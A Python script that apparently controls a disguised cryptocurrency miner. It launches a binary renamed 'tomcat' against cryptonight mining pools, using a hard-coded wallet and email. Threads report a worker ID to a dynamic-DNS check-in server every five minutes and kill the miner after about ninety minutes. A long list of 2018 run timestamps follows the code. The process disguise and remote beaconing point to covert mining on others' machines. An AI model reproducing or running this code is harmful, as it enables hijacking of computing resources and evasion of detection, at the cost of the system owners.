import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:39:02.007961
#2018-02-17 16:24:04.187470
#2018-02-17 18:12:03.466632
#2018-02-17 20:00:01.545080
#2018-02-17 21:48:06.804281
#2018-02-17 23:33:01.551320
#2018-02-18 01:22:01.565126
#2018-02-18 03:09:05.810132
#2018-02-18 04:57:02.090957
#2018-02-18 06:47:05.116826
#2018-02-18 08:37:06.018079
#2018-02-18 10:23:03.268272
#2018-02-18 12:09:01.548060
#2018-02-18 13:54:05.517108
#2018-02-18 15:45:02.855545
#2018-02-18 17:34:05.666776
#2018-02-18 19:21:06.922455
#2018-02-18 21:06:04.188165
#2018-02-18 22:53:03.783268
#2018-02-19 00:41:06.607983
#2018-02-19 02:27:07.235030
#2018-02-19 04:14:06.496936
#2018-02-19 05:58:01.787267
#2018-02-19 07:46:02.152930
#2018-02-19 09:36:02.055497
#2018-02-19 11:25:08.322856
#2018-02-19 13:12:01.236362
#2018-02-19 15:01:08.635289
#2018-02-19 16:49:11.290234
#2018-02-19 18:36:06.955227
#2018-02-19 20:21:07.265923
#2018-02-19 22:10:07.776993
#2018-02-19 23:55:07.767157
#2018-02-20 01:42:06.689416
#2018-02-20 03:30:04.279229
#2018-02-20 05:17:06.566306
#2018-02-20 06:59:05.388972
#2018-02-20 08:46:06.040077
#2018-02-20 10:30:07.736976
#2018-02-20 12:15:03.257999
#2018-02-20 14:04:04.045419
#2018-02-20 15:48:07.570878
#2018-02-20 17:34:10.735099
#2018-02-20 19:22:07.172525
#2018-02-20 21:12:08.714264
#2018-02-20 22:57:01.760132
#2018-02-21 00:41:04.192421
#2018-02-21 02:27:07.868383
#2018-02-21 04:16:05.378135
#2018-02-21 06:03:01.875409
#2018-02-21 07:49:01.755031
#2018-02-21 09:35:08.501358
#2018-02-21 11:25:06.981517
#2018-02-21 13:14:10.337941
#2018-02-21 15:01:07.333268
#2018-02-21 16:52:05.987921
#2018-02-21 18:42:08.983341
#2018-02-21 20:28:01.951016
#2018-02-21 22:16:01.930849
#2018-02-22 00:05:07.447532
#2018-02-22 01:53:06.563725
#2018-02-22 03:40:09.478461
#2018-02-22 05:27:07.611791
#2018-02-22 07:12:06.962037
#2018-02-22 09:01:01.333797
#2018-02-22 10:48:11.013226
#2018-02-22 12:36:07.508789
#2018-02-22 14:23:07.110380
#2018-02-22 16:12:04.794244
#2018-02-22 17:58:04.868863
#2018-02-22 19:47:04.249529
#2018-02-22 21:37:02.194955
#2018-02-22 23:25:09.039467
#2018-02-23 01:13:08.148099
#2018-02-23 02:59:04.084033
#2018-02-23 04:47:07.491287
#2018-02-23 06:34:01.413246
#2018-02-23 08:22:03.972241
#2018-02-23 10:38:05.452807
#2018-02-23 12:34:01.929127
#2018-02-23 14:21:09.698319
#2018-02-23 16:14:01.966824
#2018-02-23 18:01:05.987977
#2018-02-23 19:46:08.364695
#2018-02-23 21:31:08.429102
#2018-02-23 23:19:09.104585
#2018-02-24 01:11:01.643491
#2018-02-24 03:03:07.355023
#2018-02-24 04:49:06.970427
#2018-02-24 06:34:02.144504
#2018-02-24 08:23:05.313723
#2018-02-24 10:07:03.250233
#2018-02-24 12:05:01.480565
#2018-02-24 13:52:02.081863
#2018-02-24 15:31:06.597722
#2018-02-24 17:28:03.704381
#2018-02-24 19:15:07.712183
#2018-02-24 21:02:01.737151
#2018-02-24 23:34:04.845642
#2018-02-25 03:42:05.154293
#2018-02-25 07:28:01.978892